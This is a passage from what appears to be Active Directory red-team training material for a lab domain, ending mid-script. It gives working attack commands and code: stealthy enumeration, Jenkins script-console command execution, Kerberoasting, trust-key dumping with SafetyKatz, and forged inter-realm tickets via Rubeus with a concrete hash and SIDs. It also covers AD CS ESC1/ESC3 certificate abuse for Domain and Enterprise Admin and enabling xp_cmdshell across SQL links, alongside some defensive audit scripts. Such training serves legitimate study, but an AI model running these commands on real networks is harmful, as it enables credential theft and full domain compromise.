  C:\AD\Tools\Loader.exe -Path C:\AD\Tools\SharpHound\SharpHound.exe -args --collectionmethods Group,GPOLocalGroup,Session,Trusts,ACL,Container,ObjectProps,SPNTargets,CertServices --excludedcs

• Remember to remove the 'CertServices' collection method when using the BloodHound Legacy collector, which does not know it.

Domain Enumeration - SOAPHound
• Use SOAPHound for even more stealth.
• It talks to Active Directory Web Services (ADWS - port 9389) instead of sending LDAP queries - just like the AD module.
  – Almost no network-based detection (like MDI), which inspects the LDAP traffic to the DCs.
  – It retrieves all objects in one query (objectGuid=*) and then processes them locally. Only a handful of queries reach the DC - less chance of endpoint detection.

• Build a cache that includes basic info about domain objects:
  SOAPHound.exe --buildcache -c C:\AD\Tools\cache.txt
• Collect BloodHound-compatible data:
  SOAPHound.exe -c C:\AD\Tools\cache.txt --bhdump -o C:\AD\Tools\bloodhound-output --nolaps
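The "one bulk query over ADWS, then filter locally" pattern that SOAPHound uses can be reproduced from a PowerShell prompt with the AD module listed earlier, because the module also talks to ADWS on port 9389. The following is an added example written for this page, not code from the course or from SOAPHound; it assumes the lab's ADModule paths from the slides and uses userAccountControl bit values from Microsoft's documentation.

```powershell
# Added example: a single Get-ADObject call pulls every object over ADWS, and all the
# "interesting account" filtering (SPNs, pre-auth disabled, adminCount, delegation)
# then happens on the client without further queries to the DC.
Import-Module C:\AD\Tools\ADModule-master\Microsoft.ActiveDirectory.Management.dll
Import-Module C:\AD\Tools\ADModule-master\ActiveDirectory\ActiveDirectory.psd1

$UAC_ACCOUNTDISABLE         = 0x00000002
$UAC_SERVER_TRUST_ACCOUNT   = 0x00002000   # domain controller computer account
$UAC_TRUSTED_FOR_DELEGATION = 0x00080000   # unconstrained delegation
$UAC_DONT_REQ_PREAUTH       = 0x00400000   # AS-REP roastable

function Get-DomainQuickWins {
    # One ADWS query for every object; ADWS pages the result set for us.
    $props = 'objectClass','sAMAccountName','userAccountControl','servicePrincipalName',
             'adminCount','msDS-AllowedToDelegateTo'
    $all = Get-ADObject -LDAPFilter '(objectGuid=*)' -Properties $props

    # From here on nothing touches the DC: everything is filtered over the cached objects.
    $accounts = $all | Where-Object { $_.objectClass -in @('user','computer') }
    $enabled  = $accounts | Where-Object { -not ([int]$_.userAccountControl -band $UAC_ACCOUNTDISABLE) }

    [ordered]@{
        Kerberoastable = $enabled | Where-Object { $_.objectClass -eq 'user' -and $_.servicePrincipalName -and $_.sAMAccountName -ne 'krbtgt' }
        ASREPRoastable = $enabled | Where-Object { [int]$_.userAccountControl -band $UAC_DONT_REQ_PREAUTH }
        AdminCountSet  = $enabled | Where-Object { $_.objectClass -eq 'user' -and $_.adminCount -eq 1 }
        UnconstrainedDelegation = $enabled | Where-Object {
            ([int]$_.userAccountControl -band $UAC_TRUSTED_FOR_DELEGATION) -and
            -not ([int]$_.userAccountControl -band $UAC_SERVER_TRUST_ACCOUNT) }   # DCs always have it, skip them
        ConstrainedDelegation   = $enabled | Where-Object { $_.'msDS-AllowedToDelegateTo' }
    }
}

$wins = Get-DomainQuickWins
foreach ($k in $wins.Keys) {
    "== $k =="
    $wins[$k] | ForEach-Object { '  {0,-25} {1}' -f $_.sAMAccountName, (@($_.servicePrincipalName) -join ', ') }
}
```

The trade-off is the same one SOAPHound makes: a large domain means a large single transfer, but the DC sees one query with a bland filter instead of the dozens of targeted LDAP searches that PowerView issues.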

https://falconforce.nl/soaphound-tool-to-collect-active-directory-data-via-adws/
https://github.com/FalconForceTeam/SOAPHound

Reference: https://learn.microsoft.com/en-us/windows/win32/secauthz/access-control-model
Reference: https://learn.microsoft.com/en-us/windows/win32/secauthz/dacls-and-aces
Active Directory Rights: https://learn.microsoft.com/en-us/dotnet/api/system.directoryservices.activedirectoryrights?view=dotnet-plat-ext-7.0
Extended Rights: https://learn.microsoft.com/en-us/previous-versions/tn-archive/ff405676(v=msdn.10)
https://learn.microsoft.com/en-us/windows-server/identity/ad-ds/manage/group-policy/group-policy-overview
Reference:
https://learn.microsoft.com/en-us/entra/identity/domain-services/concepts-forest-trust
https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2003/cc773178(v=ws.10)

Privilege Escalation
• In an AD environment, there are multiple scenarios which lead to privilege
escalation. We had a look at the following
– Hunting for Local Admin access on other machines
– Hunting for high privilege domain accounts (like a Domain Administrator)
• Let's also look for Local Privilege Escalation.

Privilege Escalation - Feature Abuse
• What we have been doing up to now (and will keep doing further in the class) is relying on feature abuse.
• Feature abuse is powerful because there are seldom patches for it and it is not the focus of security teams.
• One of my favorite feature abuses is targeting enterprise applications that are not built with security in mind.
• On Windows, many enterprise applications need (and run with) either Administrative or SYSTEM privileges, making them a great avenue for privilege escalation.

Privilege Escalation - Feature Abuse - Jenkins
• Let's use an older version of Jenkins as an example of a vulnerable enterprise application.
• Jenkins is a widely used Continuous Integration tool.
• There are many interesting aspects to Jenkins, but for now we limit our discussion to the ability to run system commands on the Jenkins server.
• There is a Jenkins server running on dcorp-ci (172.16.3.11) on port 8080.
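The feature that gives command execution is the Groovy script console, which the blog posts in the slide notes describe. The check below is an added example written for this page, not code from the course; it uses the lab host and port from the slide and the standard Jenkins /script and /crumbIssuer endpoints, and it only tells you whether the console is reachable without credentials before running one command through it.

```powershell
# Added example: does the Jenkins instance expose its script console anonymously,
# and if so, run a single OS command through it. Host/port are the lab's dcorp-ci.
$base = 'http://172.16.3.11:8080'

function Test-JenkinsScriptConsole {
    param([string]$BaseUrl, [string]$Command = 'whoami')
    $session = New-Object Microsoft.PowerShell.Commands.WebRequestSession
    try {
        # Anonymous GET of /script: HTTP 200 means anyone can submit Groovy here.
        $null = Invoke-WebRequest -Uri "$BaseUrl/script" -WebSession $session -UseBasicParsing -ErrorAction Stop
    } catch {
        Write-Output "Script console not reachable anonymously: $($_.Exception.Message)"
        return $null
    }
    # Jenkins with CSRF protection expects a crumb header on POSTs; fetch one if offered.
    $headers = @{}
    try {
        $crumb = Invoke-RestMethod -Uri "$BaseUrl/crumbIssuer/api/json" -WebSession $session -ErrorAction Stop
        $headers[$crumb.crumbRequestField] = $crumb.crumb
    } catch { }   # crumb issuer absent: CSRF protection is off, no header needed

    # Groovy one-liner: spawn the command and print its stdout into the result page.
    $groovy = "println `"cmd.exe /c $Command`".execute().text"
    $resp = Invoke-WebRequest -Uri "$BaseUrl/script" -Method Post -WebSession $session -Headers $headers `
                -Body @{ script = $groovy } -UseBasicParsing
    # The console renders the script output inside a <pre> block.
    if ($resp.Content -match '(?s)<pre>(.*?)</pre>') { return $matches[1].Trim() }
    return $resp.Content
}

Test-JenkinsScriptConsole -BaseUrl $base -Command 'whoami'
```

The account name that comes back is the one Jenkins runs as, which on Windows installs is often a privileged service account; that is the whole point of the "feature abuse" slide above.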

http://www.labofapenetrationtester.com/2014/06/hacking-jenkins-servers.html
See more at http://www.labofapenetrationtester.com/2014/08/script-execution-and-privilege-esc-jenkins.html
http://www.labofapenetrationtester.com/2015/11/week-of-continuous-intrusion-day-1.html
https://msrc.microsoft.com/blog/2024/12/mitigating-ntlm-relay-attacks-by-default/
https://en.hackndo.com/ntlm-relay/
https://www.synacktiv.com/publications/gpoddity-exploiting-active-directory-gpos-through-ntlm-relaying-and-more
https://github.com/synacktiv/GPOddity

Lateral Movement

https://learn.microsoft.com/en-us/previous-versions/technet-magazine/ff700227(v=msdn.10)
https://learn.microsoft.com/en-us/powershell/scripting/learn/ps101/08-powershell-remoting?view=powershell-7.3
https://learn.microsoft.com/en-us/windows-server/security/windows-authentication/credentials-processes-in-windows-authentication
https://www.alteredsecurity.com/post/fantastic-windows-logon-types-and-where-to-find-credentials-in-them
https://www.ired.team/offensive-security/credential-access-and-credential-dumping
https://github.com/gentilkiwi/mimikatz
Unofficial mimikatz guide: https://adsecurity.org/?p=2207
https://github.com/GhostPack/SafetyKatz
https://github.com/SecureAuthCorp/impacket/
https://github.com/GhostPack/Rubeus/
http://passing-the-hash.blogspot.com/2014/09/pac-validation-20-minute-rule-and.html
Krbtgt hash could also be dumped from NTDS.dit.
List of SPNs: https://adsecurity.org/?page_id=183
https://www.trustedsec.com/blog/a-diamond-in-the-ruff
https://www.secureworks.com/research/skeleton-key-malware-analysis
https://adsecurity.org/?p=1785
https://adsecurity.org/?p=1714
https://learn.microsoft.com/en-us/windows/win32/secauthn/ssp-packages-provided-by-Microsoft
https://attack.mitre.org/wiki/Technique/T1101

https://learn.microsoft.com/en-us/previous-versions/technet-magazine/ee361593(v=msdn.10)
https://learn.microsoft.com/en-us/windows-server/identity/ad-ds/plan/security-best-practices/appendix-c--protected-accounts-and-groups-in-active-directory
https://adsecurity.org/?p=1906
https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-adts/dd3d29f3-8e1e-4e8c-a210-9eaef3abd628
https://www.ossir.org/paris/supports/2017/2017-04-11/2017-04-11_Active_directory_v2.5.pdf
https://gallery.technet.microsoft.com/Invoke-SDPropagator-to-c99ae41c
Reference: https://learn.microsoft.com/en-us/windows/win32/secauthz/ace-strings
https://github.com/samratashok/RACE
https://github.com/samratashok/nishang/tree/master/Backdoors
https://learn.microsoft.com/en-us/archive/blogs/wmi/scripting-wmi-namespace-security-part-1-of-3
Note: Ignore the 'I/O operation' error.
https://github.com/HarmJ0y/DAMP
https://posts.specterops.io/remote-hash-extraction-on-demand-via-host-security-descriptor-modification-2cf505ec5c40
https://www.redsiege.com/wp-content/uploads/2020/08/Kerberoastv4.pdf

Request a ticket using .NET classes:
Add-Type -AssemblyName System.IdentityModel
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "MSSQLSvc/dcorp-mgmt.dollarcorp.moneycorp.local"

Invoke-Kerberoast from Empire (https://github.com/BC-SECURITY/Empire) can be used as well; it requests the tickets and outputs them in a format for cracking with John or Hashcat:
. .\Invoke-Kerberoast.ps1
Invoke-Kerberoast -Identity svcadmin

https://github.com/jim3ma/crunch
https://github.com/r3nt0n/bopscrk
https://github.com/digininja/CeWL
https://harmj0y.medium.com/roasting-as-reps-e6179a65216b
https://posts.specterops.io/a-three-year-retrospective-c8bfe93b398a
https://room362.com/post/2016/kerberoast-pt3/
https://labs.f-secure.com/archive/trust-years-to-earn-seconds-to-break/
http://www.labofapenetrationtester.com/2016/02/getting-domain-admin-with-kerberos-unconstrained-delegation.html
https://adsecurity.org/?p=1667
https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-R2-and-2012/dn466518(v=ws.11)
https://www.slideshare.net/harmj0y/derbycon-the-unintended-risks-of-trusting-active-directory/
https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-rprn/d42db7d5-f141-4466-8f47-0a4be14e2fc1
https://posts.specterops.io/not-a-security-boundary-breaking-forest-trusts-cd125829518d
https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-sfu/3bff5864-8135-400e-bdd9-33b552051d94
https://eladshamir.com/2019/01/28/Wagging-the-Dog.html
https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html

Priv Esc - Across Trusts
• Across Domains - Implicit two way trust relationship.
• Across Forests - Trust relationship needs to be established.

Priv Esc - Enterprise Admins
• sIDHistory is a user attribute designed for scenarios where a user is moved from one domain to another. When a user's domain is changed, they get a new SID and the old SID is added to sIDHistory. Every SID in sIDHistory is still placed in the user's access token, which is why the attribute can be abused.
• sIDHistory can be abused in two ways to escalate privileges within a forest:
– krbtgt hash of the child
– Trust tickets
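Whether an injected sIDHistory survives a trust depends on the trust's attributes, so it is worth checking them before forging anything. The function below is an added example for this page, not course code: it lists every trust of the current domain with the AD module and gives a verdict from the trustAttributes bits (values from MS-ADTS; the verdict wording is the editor's). It assumes the lab's AD module paths from the enumeration slides.

```powershell
# Added example: enumerate trusts and judge whether sIDHistory injection would pass.
Import-Module C:\AD\Tools\ADModule-master\Microsoft.ActiveDirectory.Management.dll
Import-Module C:\AD\Tools\ADModule-master\ActiveDirectory\ActiveDirectory.psd1

$TRUST_ATTRIBUTE_NON_TRANSITIVE     = 0x1
$TRUST_ATTRIBUTE_QUARANTINED_DOMAIN = 0x4    # SID filtering on an external trust
$TRUST_ATTRIBUTE_FOREST_TRANSITIVE  = 0x8    # forest trust
$TRUST_ATTRIBUTE_CROSS_ORGANIZATION = 0x10   # selective authentication
$TRUST_ATTRIBUTE_WITHIN_FOREST      = 0x20   # parent/child or tree-root trust
$TRUST_ATTRIBUTE_TREAT_AS_EXTERNAL  = 0x40   # forest trust with SID history enabled

function Get-TrustSidHistoryExposure {
    Get-ADTrust -Filter * | ForEach-Object {
        $attr = [int]$_.TrustAttributes
        $verdict = if ($attr -band $TRUST_ATTRIBUTE_WITHIN_FOREST) {
            'intra-forest: no SID filtering; child krbtgt or trust key plus sIDHistory RID 519 gives Enterprise Admins'
        } elseif (($attr -band $TRUST_ATTRIBUTE_FOREST_TRANSITIVE) -and ($attr -band $TRUST_ATTRIBUTE_TREAT_AS_EXTERNAL)) {
            'forest trust with SID history enabled: filtering relaxed, check which SIDs pass'
        } elseif (($attr -band $TRUST_ATTRIBUTE_FOREST_TRANSITIVE) -or ($attr -band $TRUST_ATTRIBUTE_QUARANTINED_DOMAIN)) {
            'SID filtering active: target-side SIDs in sIDHistory are dropped, you remain the trusted user'
        } else {
            'external trust without quarantine: SID filtering off, sIDHistory is honoured'
        }
        [pscustomobject]@{
            Target          = $_.Target
            Direction       = $_.Direction
            TrustType       = $_.TrustType
            Transitive      = -not ($attr -band $TRUST_ATTRIBUTE_NON_TRANSITIVE)
            SelectiveAuth   = [bool]($attr -band $TRUST_ATTRIBUTE_CROSS_ORGANIZATION)
            TrustAttributes = '0x{0:X}' -f $attr
            Verdict         = $verdict
        }
    }
}

Get-TrustSidHistoryExposure | Format-List
```

In moneycorp the child-to-parent trust shows WITHIN_FOREST, which is why the next slides can jump straight to Enterprise Admins; for the external trust later in the module expect QUARANTINED_DOMAIN or FOREST_TRANSITIVE, where the same trick is blunted by SID filtering.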


Kerberos - Across Domain Trusts

Priv Esc - Enterprise Admins - Trust Key Abuse

Priv Esc - Child to Parent using Trust Tickets
• What is required to forge trust tickets is, obviously, the trust key. Look for the [In] trust key from child to parent on the child DC:
  SafetyKatz.exe "lsadump::trust /patch"
  or
  SafetyKatz.exe "lsadump::dcsync /user:dcorp\mcorp$"
  or
  SafetyKatz.exe "lsadump::lsa /patch"

https://adsecurity.org/?p=1588

Priv Esc - Child to Parent using Trust Tickets - Rubeus
• Forge an inter-realm TGT using Rubeus:
  C:\AD\Tools\Rubeus.exe silver /service:krbtgt/DOLLARCORP.MONEYCORP.LOCAL /rc4:17e8f4d3f4b46e95048a66a5dd890ee3 /sid:S-1-5-21-719815819-3726368948-3917688648 /sids:S-1-5-21-335606122-960912869-3279953914-519 /ldap /user:Administrator /nowrap
  – /rc4 is the trust key from the previous slide, /sid is the SID of the child domain (dollarcorp) and /sids is the parent's Enterprise Admins SID (RID 519), which goes into sIDHistory.

• Use the forged ticket:
  C:\AD\Tools\Rubeus.exe asktgs /service:http/mcorp-dc.MONEYCORP.LOCAL /dc:mcorp-dc.MONEYCORP.LOCAL /ptt /ticket:<FORGED TICKET>

Priv Esc - Enterprise Admins - krbtgt Secret Abuse

https://posts.specterops.io/certificates-and-pwnage-and-patches-oh-my-8ae0f4304c1d

Kerberos - Across External Trusts

Priv Esc - Across External Trust - Trust Key Abuse

Priv Esc - Across Forest using Trust Tickets
• We require the trust key for the inter-forest trust from the DC that has the external trust:
  SafetyKatz.exe -Command '"lsadump::trust /patch"'
  or
  SafetyKatz.exe -Command '"lsadump::lsa /patch"'

https://adsecurity.org/?p=1588

Priv Esc - Across Forest using Trust Tickets - Rubeus
• Forge an inter-realm TGT using Rubeus. The command below repeats the child-to-parent values; for an external trust replace /rc4 with the inter-forest trust key and /service, /sid and /sids with the values of the trust you are crossing:
  C:\AD\Tools\Rubeus.exe silver /service:krbtgt/DOLLARCORP.MONEYCORP.LOCAL /rc4:17e8f4d3f4b46e95048a66a5dd890ee3 /sid:S-1-5-21-719815819-3726368948-3917688648 /sids:S-1-5-21-335606122-960912869-3279953914-519 /ldap /user:Administrator /nowrap

• Use the forged ticket:
  C:\AD\Tools\Rubeus.exe asktgs /service:http/mcorp-dc.MONEYCORP.LOCAL /dc:mcorp-dc.MONEYCORP.LOCAL /ptt /ticket:<FORGED TICKET>

• Caveat: SID filtering is enabled by default on external and forest trusts. SIDs in sIDHistory that belong to the target forest (such as its Enterprise Admins SID, RID 519) are stripped from the PAC, so across a forest trust you authenticate as the trusted-domain user and get only what that user was explicitly granted in the other forest.

Priv Esc - Across domain trusts - AD CS
• Active Directory Certificate Services (AD CS) enables use of Public Key Infrastructure (PKI) in an Active Directory forest.
• AD CS helps in authenticating users and machines, encrypting and signing documents, filesystems, emails and more.
• "AD CS is the Server Role that allows you to build a public key infrastructure (PKI) and provide public key cryptography, digital certificates, and digital signature capabilities for your organization."

https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/hh831740(v=ws.11)
https://learn.microsoft.com/en-us/windows-server/identity/ad-cs/active-directory-certificate-services-overview

Priv Esc - Across domain trusts - AD CS
• CA - The certification authority that issues certificates. The server with the AD CS role (a DC or a separate server) is the CA.
• Certificate - Issued to a user or machine and can be used for authentication, encryption, signing etc.
• CSR - Certificate Signing Request made by a client to the CA to request a certificate.
• Certificate Template - Defines settings for a certificate. Contains information like enrollment permissions, EKUs, expiry etc.
• EKU OIDs - Extended Key Usage Object Identifiers. These dictate what a certificate issued from a template can be used for (Client Authentication, Smart Card Logon, SubCA etc.).

Priv Esc - Across domain trusts - AD CS

Diagram source - https://www.specterops.io/assets/resources/Certified_Pre-Owned.pdf

Priv Esc - Across domain trusts - AD CS
• There are various ways of abusing AD CS (see the link to the "Certified Pre-Owned" paper in the slide notes):
– Extract user and machine certificates
– Use certificates to retrieve the NTLM hash
– User and machine level persistence
– Escalation to Domain Admin and Enterprise Admin
– Domain persistence
• We will not discuss all of the techniques!

See pages 4 and 5 for a summary of attack techniques - https://www.specterops.io/assets/resources/Certified_Pre-Owned.pdf

Priv Esc - Across domain trusts - AD CS
Stealing Certificates
– THEFT1 - Export certs with private keys using Windows' crypto APIs
– THEFT2 - Extracting user certs with private keys using DPAPI
– THEFT3 - Extracting machine certs with private keys using DPAPI
– THEFT4 - Steal certificates from files and stores
– THEFT5 - Use Kerberos PKINIT to get the NTLM hash
Persistence
– PERSIST1 - User persistence by requesting new certs
– PERSIST2 - Machine persistence by requesting new certs
– PERSIST3 - User/Machine persistence by renewing certs

Priv Esc - Across domain trusts - AD CS
Escalation
– ESC1 - Enrollee can request a cert for ANY user
– ESC2 - Any Purpose or no EKU (potentially dangerous)
– ESC3 - Request an enrollment agent certificate and use it to request a cert on behalf of ANY user
– ESC4 - Overly permissive ACLs on templates
– ESC5 - Poor access control on the CA server, CA server computer object etc.
– ESC6 (Patched - May'22) - EDITF_ATTRIBUTESUBJECTALTNAME2 setting on the CA - request certs for ANY user
– ESC7 - Poor access control on roles on the certificate authority like "CA Administrator" and "Certificate Manager"
– ESC8 - NTLM relay to HTTP enrollment endpoints
– ESC9 - No Security Extension (enrollee can modify own UPN to request a cert on behalf of ANY user)
– ESC10 - Weak (implicit) certificate mapping (enrollee can modify own UPN to request a cert on behalf of ANY user)
– ESC11 - NTLM relay to weak RPC enrollment endpoints
– ESC12 - Steal the CA private key from a Yubico YubiHSM
– ESC13 - Enrollee gets the privileges of the linked group
– ESC14 (To be patched) - Authenticate as the target using a certificate referenced in the target's altSecurityIdentities attribute
– ESC15 (Patched Nov'24) - EKUwu - abuse of default version 1 templates to 'override' EKUs

Priv Esc - Across domain trusts - AD CS
• Domain Persistence:
– DPERSIST1 - Forge certificates with stolen CA private keys
– DPERSIST2 - Malicious root/intermediate CAs
– DPERSIST3 - Backdoor CA Server, CA server computer object etc.



Priv Esc - Across domain trusts - AD CS
• We can use the Certify tool (https://github.com/GhostPack/Certify) to
enumerate (and for other attacks) AD CS in the target forest:
Certify.exe cas

• Enumerate the templates:
Certify.exe find

• Enumerate vulnerable templates:
Certify.exe find /vulnerable



Priv Esc - Across domain trusts - AD CS
• In moneycorp, there are multiple misconfigurations in AD CS.
• Common requirements/misconfigurations for all the escalations that we
have in the lab (ESC1 and ESC3):
– CA grants normal/low-privileged users enrollment rights
– Manager approval is disabled
– Authorization signatures are not required
– The target template grants normal/low-privileged users enrollment
rights



Priv Esc - Across domain trusts - AD CS - ESC3
• The template "SmartCardEnrollment-Agent" allows Domain users to
enroll and has "Certificate Request Agent" EKU.
Certify.exe find /vulnerable

• The template "SmartCardEnrollment-Users" has an Application Policy
Issuance Requirement of Certificate Request Agent and has an EKU that
allows for domain authentication.



Priv Esc - Across domain trusts - AD CS - ESC3
Escalation to DA
• We can now request a certificate for Certificate Request Agent from "SmartCardEnrollment-
Agent" template.
Certify.exe request /ca:mcorp-dc.moneycorp.local\moneycorp-MCORP-DC-CA
/template:SmartCardEnrollment-Agent

• Convert from cert.pem to pfx (esc3agent.pfx below) and use it to request a certificate on
behalf of DA using the "SmartCardEnrollment-Users" template.
Certify.exe request /ca:mcorp-dc.moneycorp.local\moneycorp-MCORP-DC-CA
/template:SmartCardEnrollment-Users /onbehalfof:dcorp\administrator
/enrollcert:esc3agent.pfx /enrollcertpw:SecretPass@123

• Convert from cert.pem to pfx (esc3user-DA.pfx below), request DA TGT and inject it:
Rubeus.exe asktgt /user:administrator /certificate:esc3user-DA.pfx
/password:SecretPass@123 /ptt



Priv Esc - Across domain trusts - AD CS - ESC3
Escalation to EA
• Convert from cert.pem to pfx (esc3agent.pfx below) and use it to request a
certificate on behalf of EA using the "SmartCardEnrollment-Users" template.
Certify.exe request /ca:mcorp-dc.moneycorp.local\moneycorp-MCORP-DC-CA
/template:SmartCardEnrollment-Users
/onbehalfof:moneycorp.local\administrator
/enrollcert:esc3agent.pfx /enrollcertpw:SecretPass@123

• Request EA TGT and inject it:
Rubeus.exe asktgt /user:moneycorp.local\administrator
/certificate:esc3user.pfx /dc:mcorp-dc.moneycorp.local
/password:SecretPass@123 /ptt



Priv Esc - Across domain trusts - AD CS - ESC1
• The template "HTTPSCertificates" has ENROLLEE_SUPPLIES_SUBJECT value for
msPKI-Certificates-Name-Flag.
Certify.exe find /enrolleeSuppliesSubject

• The template "HTTPSCertificates" allows enrollment to the RDPUsers group. Request
a certificate for DA (or EA) as studentx:
Certify.exe request /ca:mcorp-dc.moneycorp.local\moneycorp-MCORP-DC-CA
/template:"HTTPSCertificates" /altname:administrator

• Convert from cert.pem to pfx (esc1.pfx below) and use it to request a TGT for DA (or
EA).
Rubeus.exe asktgt /user:administrator /certificate:esc1.pfx
/password:SecretPass@123 /ptt
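The prerequisites listed for the lab (low-privileged enrollment, no manager approval, no authorization signatures) together with the ESC1 and ESC3 template conditions can be checked offline. The following is an added example, not course material and not Certify's code: it classifies template records shaped like the msPKI-* attributes, so a defender can triage templates exported from AD. The template records, the "RDPUsers" handling and the flag values are constructed for the example.

```python
"""Offline audit of AD CS certificate templates for the ESC1 / ESC3 conditions.

Added example: template records are constructed in the shape of the msPKI-*
attributes, they are not exported from the lab CA. Flag bits and EKU OIDs are
the documented Microsoft values.
"""

# msPKI-Certificate-Name-Flag bit: enrollee supplies the subject / SAN
CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT = 0x00000001
# msPKI-Enrollment-Flag bit: CA certificate manager approval required
CT_FLAG_PEND_ALL_REQUESTS = 0x00000002

EKU_CLIENT_AUTH = "1.3.6.1.5.5.7.3.2"
EKU_SERVER_AUTH = "1.3.6.1.5.5.7.3.1"
EKU_SMARTCARD_LOGON = "1.3.6.1.4.1.311.20.2.2"
EKU_PKINIT_CLIENT_AUTH = "1.3.6.1.5.2.3.4"
EKU_ANY_PURPOSE = "2.5.29.37.0"
EKU_CERT_REQUEST_AGENT = "1.3.6.1.4.1.311.20.2.1"

# EKUs that let the resulting certificate authenticate to the domain
AUTH_EKUS = {EKU_CLIENT_AUTH, EKU_SMARTCARD_LOGON, EKU_PKINIT_CLIENT_AUTH, EKU_ANY_PURPOSE}

# Principals treated as "normal / low-privileged" unless the auditor says otherwise
LOW_PRIV_PRINCIPALS = {"Domain Users", "Authenticated Users", "Domain Computers", "Everyone"}


def allows_authentication(ekus):
    # A template with no EKU at all also allows authentication (the ESC2 case)
    return not ekus or bool(AUTH_EKUS & set(ekus))


def low_priv_can_enroll(template, low_priv):
    return bool(set(template["enroll_principals"]) & low_priv)


def common_prerequisites(template, low_priv):
    """The conditions shared by the lab's ESC1 and ESC3 agent templates:
    low-priv enrollment, no manager approval, no authorization signatures."""
    return (
        low_priv_can_enroll(template, low_priv)
        and not template["enrollment_flag"] & CT_FLAG_PEND_ALL_REQUESTS
        and template["ra_signature"] == 0
    )


def audit(templates, low_priv=LOW_PRIV_PRINCIPALS):
    """Return {template name: [findings]} over a whole template set."""
    report = {}
    agent_templates = []
    for t in templates:
        findings = []
        if common_prerequisites(t, low_priv):
            # ESC1: enrollee supplies the subject and the certificate can authenticate
            if t["name_flag"] & CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT and allows_authentication(t["ekus"]):
                findings.append("ESC1")
            # ESC3, first half: the template issues Certificate Request Agent certificates
            if EKU_CERT_REQUEST_AGENT in t["ekus"]:
                findings.append("ESC3-agent")
                agent_templates.append(t["name"])
        report[t["name"]] = findings
    # ESC3, second half, only relevant once an agent certificate is obtainable: a template
    # that requires one agent signature (Certificate Request Agent application policy)
    # and issues an authentication certificate
    if agent_templates:
        for t in templates:
            if (low_priv_can_enroll(t, low_priv)
                    and t["ra_signature"] == 1
                    and EKU_CERT_REQUEST_AGENT in t["ra_application_policies"]
                    and allows_authentication(t["ekus"])):
                report[t["name"]].append("ESC3-target")
    return report


def _template(name, ekus, enroll, name_flag=0, enrollment_flag=0, ra_signature=0, ra_policies=()):
    return {"name": name, "ekus": list(ekus), "enroll_principals": list(enroll),
            "name_flag": name_flag, "enrollment_flag": enrollment_flag,
            "ra_signature": ra_signature, "ra_application_policies": list(ra_policies)}


# Constructed template set modelled on the names the slides describe, plus a hardened one
SAMPLE_TEMPLATES = [
    _template("SmartCardEnrollment-Agent", [EKU_CERT_REQUEST_AGENT], ["Domain Users"]),
    _template("SmartCardEnrollment-Users", [EKU_SMARTCARD_LOGON, EKU_CLIENT_AUTH], ["Domain Users"],
              ra_signature=1, ra_policies=[EKU_CERT_REQUEST_AGENT]),
    _template("HTTPSCertificates", [EKU_SERVER_AUTH, EKU_CLIENT_AUTH], ["RDPUsers"],
              name_flag=CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT),
    # same shape as HTTPSCertificates but manager approval is required: not an ESC1 finding
    _template("WebServer-Approved", [EKU_SERVER_AUTH, EKU_CLIENT_AUTH], ["Domain Users"],
              name_flag=CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT, enrollment_flag=CT_FLAG_PEND_ALL_REQUESTS),
    _template("User", [EKU_CLIENT_AUTH], ["Domain Users"]),
]

if __name__ == "__main__":
    # RDPUsers only counts as low-privileged when the auditor says so (the lab puts students in it)
    for name, findings in audit(SAMPLE_TEMPLATES, LOW_PRIV_PRINCIPALS | {"RDPUsers"}).items():
        print("%-28s %s" % (name, ", ".join(findings) or "-"))
```

Running it with the default group set leaves HTTPSCertificates clean; adding RDPUsers to the low-privileged set is what surfaces the ESC1 finding, which is why the audit takes that set as input.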

Trust Abuse - MSSQL Servers - Database Links
• A database link allows a SQL Server to access external data sources like
other SQL Servers and OLE DB data sources.
• In the case of database links between SQL servers (linked SQL servers),
it is possible to execute stored procedures on the linked server.
• Database links work even across forest trusts.

More at: https://learn.microsoft.com/en-us/sql/relational-databases/linked-servers/linked-servers-database-engine?view=sql-server-ver16


Trust Abuse - MSSQL Servers - Database Links
Searching Database Links
• Look for links to remote servers
Get-SQLServerLink -Instance dcorp-mssql -Verbose

Or

select * from master..sysservers



Trust Abuse - MSSQL Servers - Database Links
Enumerating Database Links - Manually
• Openquery() function can be used to run queries on a linked database
select * from openquery("dcorp-sql1",'select * from master..sysservers')



Trust Abuse - MSSQL Servers - Database Links
Enumerating Database Links
Get-SQLServerLinkCrawl -Instance dcorp-mssql -Verbose
or
• Openquery queries can be chained to access links within links (nested
links)
select * from openquery("dcorp-sql1",'select * from openquery("dcorp-mgmt",''select * from master..sysservers'')')



Trust Abuse - MSSQL Servers - Database Links
Executing Commands
• On the target server, either xp_cmdshell should be already enabled; or
• If rpcout is enabled (disabled by default), xp_cmdshell can be enabled
using:
EXECUTE('sp_configure ''xp_cmdshell'',1;reconfigure;') AT "eu-sql"
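Link chains are easier to reason about as a graph. The following is an added example (not PowerUpSQL and not the course's queries): it crawls a constructed link map in the shape of master..sysservers output, rebuilds the nested openquery statement from the quote-doubling rule the slides show, and flags hops that leave the home forest or have RPC Out enabled. The link rows and the forest name are assumptions mirroring the slide's hop names.

```python
"""Map SQL Server database links as a graph and flag the risky hops.

Added example, not the PowerUpSQL cmdlets or the course's queries: the link
rows are constructed in the shape of master..sysservers output and mirror the
hop names used in the slides (dcorp-mssql -> dcorp-sql1 -> dcorp-mgmt -> eu-sql).
"""
from collections import deque

# Constructed: source instance -> [(linked server name, rpc out enabled)]
LINKS = {
    "dcorp-mssql": [("dcorp-sql1", False)],
    "dcorp-sql1": [("dcorp-mgmt", False), ("dcorp-mssql", False)],  # back-link: a cycle
    "dcorp-mgmt": [("eu-sql.eu.eurocorp.local", True)],
    "eu-sql.eu.eurocorp.local": [],
}


def crawl_links(links, start):
    """Breadth-first crawl over the link graph.

    Returns {server: path from start}, so every server reachable through
    nested links is listed once even when links loop back."""
    paths = {start: [start]}
    queue = deque([start])
    while queue:
        here = queue.popleft()
        for target, _rpc_out in links.get(here, []):
            if target not in paths:          # cycle / duplicate guard
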